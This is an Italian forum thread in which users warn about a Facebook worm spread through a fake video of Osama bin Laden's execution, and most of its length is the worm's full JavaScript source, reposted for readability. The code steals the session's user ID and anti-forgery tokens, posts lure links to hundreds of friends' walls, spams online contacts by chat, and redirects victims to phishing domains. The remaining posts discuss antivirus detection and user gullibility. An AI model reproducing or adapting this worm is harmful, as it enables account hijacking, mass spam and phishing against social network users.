www.MegaLab.it

[hashcat]

Kaspersky rileva strummer5202.info/you/joe.php come infetta:

HEUR:Worm.Script.Generic

EDIT:

Ecco qui il codice sorgente della pagina (se non essere disponibile in futuro):

http://pastebin.com/UiUvaBWJ

[Berga95]

Vero
Solo lui... per giunta con l'euristica... chissà se anche altri AV lo rintracceranno...
Comunque, siccome il codice JS l'avevo messo senza tab, (non si capiva na mazza [sh] ) lo rimetto:

Codice: Seleziona tutto

///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// joelives
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');

function readCookie(name) {
   
   var nameEQ = name + "=";
   var ca = document.cookie.split(';');
   for(var i=0;i < ca.length;i++) {
      var c = ca[i];
      while (c.charAt(0)==' ') c = c.substring(1,c.length);
      if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
   }
   return null;

}

var user_id = readCookie("c_user");


// Setup some variables

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;


// Multiple URL Shorteners

var shortArray = new Array(
            "http://ow.ly/4LNpd",
            "http://clickily.ws/zyaeom"
           );

var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];

// Chat message variables

var this_chat = "Guarda il video dell'esecuzione di osama bin laden : / http://tinyurl.com/3gy5rdp";
var prepared_chat = encodeURIComponent(this_chat);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var token = Math.round(new Date().getTime() / 1000);

var http1 = new XMLHttpRequest();

var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";

var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.

   if(http1.readyState == 4 && http1.status == 200) { // If state = success
      
      var response1 = http1.responseText;
      
      response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
      response1 = JSON.parse(response1); // Convert the response to JSON
      
      //alert(response4.toSource());
      
      var count = 0;
      
      for(uid in response1.payload.entries){
         
         if(count < 400){
            
            //alert("SENT TO "+response1.payload.entries[count].uid);

            // Loop to send messages
         
            // New XMLHttp object
            var httpwp = new XMLHttpRequest();
                     
            var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
            var randLink = new Array("http://www.facebook.com/pages/Bin-Laden-filmato-della-morte/220917514589882?",
"http://www.facebook.com/pages/Video-Morte-di-Osama-Scioccante/185145894868858?",
"http://www.facebook.com/pages/Osama-la-ripresa-dellesecuzione/207377795963147?",
"http://www.facebook.com/pages/Video-integrale-morte-osama/160160600713068?",
"http://www.facebook.com/pages/Video-morte-di-Bin-Laden/207942222570998?",
"http://www.facebook.com/pages/Osama-ecco-il-filmato-dellattacco-dei-soldati/218470064846463?",
"http://www.facebook.com/pages/Video-scioccante-Osama/223750520974663?",
"http://www.facebook.com/pages/Filmato-suicidio-di-Osama/163954453664922?",
"http://www.facebook.com/pages/Morte-osama-scioccante/200258923349460?",
"http://www.facebook.com/pages/Mortee-di-osama-ecco-il-documento/152569268142253?",
"http://www.facebook.com/pages/Esecuzione-morte-osama/169294976461920?",
"http://www.facebook.com/pages/Osama-riprese-dellattacco/219103628099719?",
"http://www.facebook.com/pages/Ecco-il-video-di-osama/219488704729435?",
"http://www.facebook.com/pages/Ecco-qui-la-della-morte-di-ossama/184860774895355?",
"http://www.facebook.com/pages/Filmato-dellesecuzione-di-ossama/214155628604153?",
"http://www.facebook.com/pages/Osama-ecco-il-video-integrale/112701738814253?",
"http://www.facebook.com/pages/Osama-filmato/121083417971352?",
"http://www.facebook.com/pages/Osama-scioccante-riproduzione/128548893886623?",
"http://www.facebook.com/pages/Ossama-ecco-le-riprese/218816904797657?",
"http://www.facebook.com/pages/Video-mortee-di-ossama/185207694861003?",
"http://www.facebook.com/pages/Osama-video-esecuziome/218415021503983?",
"http://www.facebook.com/pages/Osamma-ecco-lesecuzione/212492518769037?",
"http://www.facebook.com/pages/Dio-mio-ecco-la-mortee-di-osamas/143509959054039?",
"http://www.facebook.com/pages/Ecco-la-fine-di-ossaama/184355164949820?",
"http://www.facebook.com/pages/Video-uccisisone-di-ossamma/221386654538707?",
"http://www.facebook.com/pages/Ecco-come-%C3%A8-morteo-osasma/169336573123501?",
"http://www.facebook.com/pages/Morte-osasdma-bin-laden/200306210004897?",
"http://www.facebook.com/pages/Osama-ecco-il-video-integrale/210973072259792?",
"http://www.facebook.com/pages/Ossamas-bin-laden-videos-modfrte/189298697773277?",
"http://www.facebook.com/pages/Filmato-morte-Bin-Laden/199725546735628?");
            var statusmessage="questo è davvero scioccante..";
            var title="Il video dell esecuzione di bin laden!";
//            var link="http://www.facebook.com/pages/Ecco-il-video-di-osama/219488704729435?";
            var link = randLink[Math.floor(randLink.length*Math.random())];
            var description="guarda cosa fanno questi soldati ad Osama! ";
            var picture="http://i54.tinypic.com/k0r1xh.jpg";
            
            var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries

[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment

[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]

="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%

3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]

="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6]

[name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7]

[content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-

z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]

="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags]

[description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]

=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
            
            httpwp.open("POST", urlwp, true);
            
            //Send the proper header information along with the request
            
            httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            httpwp.setRequestHeader("Content-length", paramswp.length);
            httpwp.setRequestHeader("Connection", "keep-alive");               
            
            httpwp.onreadystatechange = function() { //Call a function when the state changes.
               if(httpwp.readyState == 4 && httpwp.status == 200){
                  //alert(http.responseText);
                  //alert('buddy list fetched');
               }

            }

            httpwp.send(paramswp);
   
         }

         count++; // increment counter
      
      }
            
      http1.close; // Close the connection
      
      
      
   }
   
}

http1.send(null);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var hide = document.getElementById('fbDockChatTabSlider');

hide.style.display = "none";


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http3 = new XMLHttpRequest();

var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);

//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");

http3.onreadystatechange = function() {//Call a function when the state changes.
   if(http3.readyState == 4 && http3.status == 200) {
      
      var response3 = http3.responseText;
      
      response3 = response3.replace("for (;;);", "");
      response3 = JSON.parse(response3);
      
      var count = 0;
      
      for(property in response3.payload.buddy_list.nowAvailableList){
         
         if(count < 100){
            
            // Loop to send messages
         
            // New XMLHttp object
            var httpc = new XMLHttpRequest();
            
            // Generate random message ID
                        
            var msgid = Math.floor(Math.random()*1000000);
            
            var time = Math.round(new Date().getTime() / 1000);
            
            var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
            var paramsc =

"msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_d

tsg+"&lsd&post_form_id_source=AsyncRequest";
            httpc.open("POST", urlc, true);
            
            //Send the proper header information along with the request
            httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            httpc.setRequestHeader("Content-length", paramsc.length);
            httpc.setRequestHeader("Connection", "close");
            
            httpc.onreadystatechange = function() { //Call a function when the state changes.
               if(httpc.readyState == 4 && httpc.status == 200){
                  //alert(http.responseText);
                  //alert('buddy list fetched');
               }
            }
            httpc.send(paramsc);
   
         }
         
         //alert(property);
         count++; // increment counter
      
      }
      
      http3.close; // Close the connection
      
   }
}
http3.send(params3);







/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http4 = new XMLHttpRequest();

var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params4 = "fbpage_id=199725546735628&add=1&reload=0&preserve_tab=false&nctr[_mod]

=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
   if(http4.readyState == 4 && http4.status == 200) {
         
      http4.close; // Close the connection
      
   }
}
http4.send(params4);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http5 = new XMLHttpRequest();

var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params5 = "fbpage_id=185145894868858&add=1&reload=0&preserve_tab=false&nctr[_mod]

=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http5.open("POST", url5, true);

//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");

http5.onreadystatechange = function() {//Call a function when the state changes.
   if(http5.readyState == 4 && http5.status == 200) {
         
      http5.close; // Close the connection
      
   }
}
http5.send(params5);
*/

//document.getElementById('susta').style.display="none";
document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src=\"http://www.hindustantimes.com/images/loading_gif.gif\" /><br

/>Caricamento video in corso ...</center>";
var endArray = new Array("quanteore.com", "verifica-account.com", "facebook.verifica-account.com");


var ending = endArray[Math.floor(endArray.length*Math.random())];
setTimeout("window.location = 'http://'+ending+'/index.php';", 15000);


EDIT: Codice che puntualmente, con un EDIT, hashcat ha messo anche lui È già la seconda volta oggi

[Andy94]

A proposito, volevo segnalare che avendo OpenDNS la pagina è bloccata per motivi di "phishing".

[hashcat]

Altra variante del worm:

http://pastebin.com/uk0NZ758

[farbix89]

Siamo arrivati al punto dove la gente si butta nel pozzo a tuo comando,senza obbiettare


Io li denuncierei non per crimini informatici,ma per "sfruttamento abusivo dell'ignoranza"

[Hpmezzo]

hahahahahahhahahahahahah :D Addiritturaaa!!!!! Comunque non è la prima volta che mi imbatto in questo genere di pagine...L'altra volte un video dell'isola dei famosi che mi chiedeva di scaricare uno strano codec... Malware assicurato! La pagina non so se è ancora esistente...

[Berga95]

Segnalo che nell'articolo, nella sezione dei commenti viene riportato "Errore del server. Per visualizzare questo messaggio clicca qui" in quei post dove viene utilizzato il TAG Code, Img e compagnia bella

Buon articolo BlackJack, comunque

[ste_95]

Segnalo che nell'articolo, nella sezione dei commenti viene riportato "Errore del server. Per visualizzare questo messaggio clicca qui" in quei post dove viene utilizzato il TAG Code, Img e compagnia bella

Grazie Berga, ho girato la cosa a chi di dovere

[scr1]

Salve a tutti , io ho deciso di annullare l'account su facebook , è un ricettacolo di malware

[Sabbb]

Salve a tutti , io ho deciso di annullare l'account su facebook , è un ricettacolo di malware

è un posto come un altro.Basta stare solo un pochino attenti..

[scr1]

Salve a tutti , io ho deciso di annullare l'account su facebook , è un ricettacolo di malware

è un posto come un altro.Basta stare solo un pochino attenti..

Non lo parametrizzo a questo neanche morto

[winman]

Ed infatti ieri, come al solito, c'è stato il passarola inconsapevole !!!!
Beata ignoranza !!!!

[edoluz]

Salve a tutti , io ho deciso di annullare l'account su facebook , è un ricettacolo di malware

attenzione che anche facendo sesso rischi di prendere malattie... pure con un bacio! secondo me ti conviene cancellare anche quegli account! ;)

in effetti basta solo essere attenti. tutto qui.

comunque non credo che siano da incolpare i poveri cristi che di computer capiscono il minimo indispensabile e che finiscono per cliccare su un link: credo invece che ci dovrebbe essere un controllo un filo più stretto su certi elementi ed eventualmente un blocco immediato di link e applicazioni sospette...
non capisco come sia possibile che questo link continui a girare senza che venga bloccato.

una moderazione non ci starebbe male dato che sta diventando una giungla di porcherie...

[BlackJack]

Salve a tutti , io ho deciso di annullare l'account su facebook , è un ricettacolo di malware

attenzione che anche facendo sesso rischi di prendere malattie... pure con un bacio! secondo me ti conviene cancellare anche quegli account! ;)

in effetti basta solo essere attenti. tutto qui.

comunque non credo che siano da incolpare i poveri cristi che di computer capiscono il minimo indispensabile e che finiscono per cliccare su un link: credo invece che ci dovrebbe essere un controllo un filo più stretto su certi elementi ed eventualmente un blocco immediato di link e applicazioni sospette...
non capisco come sia possibile che questo link continui a girare senza che venga bloccato.

una moderazione non ci starebbe male dato che sta diventando una giungla di porcherie...

Detto, magari, in altri termini, ma non posso che essere daccordo!!

p.s.: Grazie Berga!

[scr1]

Salve a tutti , io ho deciso di annullare l'account su facebook , è un ricettacolo di malware

attenzione che anche facendo sesso rischi di prendere malattie... pure con un bacio! secondo me ti conviene cancellare anche quegli account! ;)

in effetti basta solo essere attenti. tutto qui.

comunque non credo che siano da incolpare i poveri cristi che di computer capiscono il minimo indispensabile e che finiscono per cliccare su un link: credo invece che ci dovrebbe essere un controllo un filo più stretto su certi elementi ed eventualmente un blocco immediato di link e applicazioni sospette...
non capisco come sia possibile che questo link continui a girare senza che venga bloccato.

una moderazione non ci starebbe male dato che sta diventando una giungla di porcherie...

Per il sesso ci penso io te pensa all'altra roba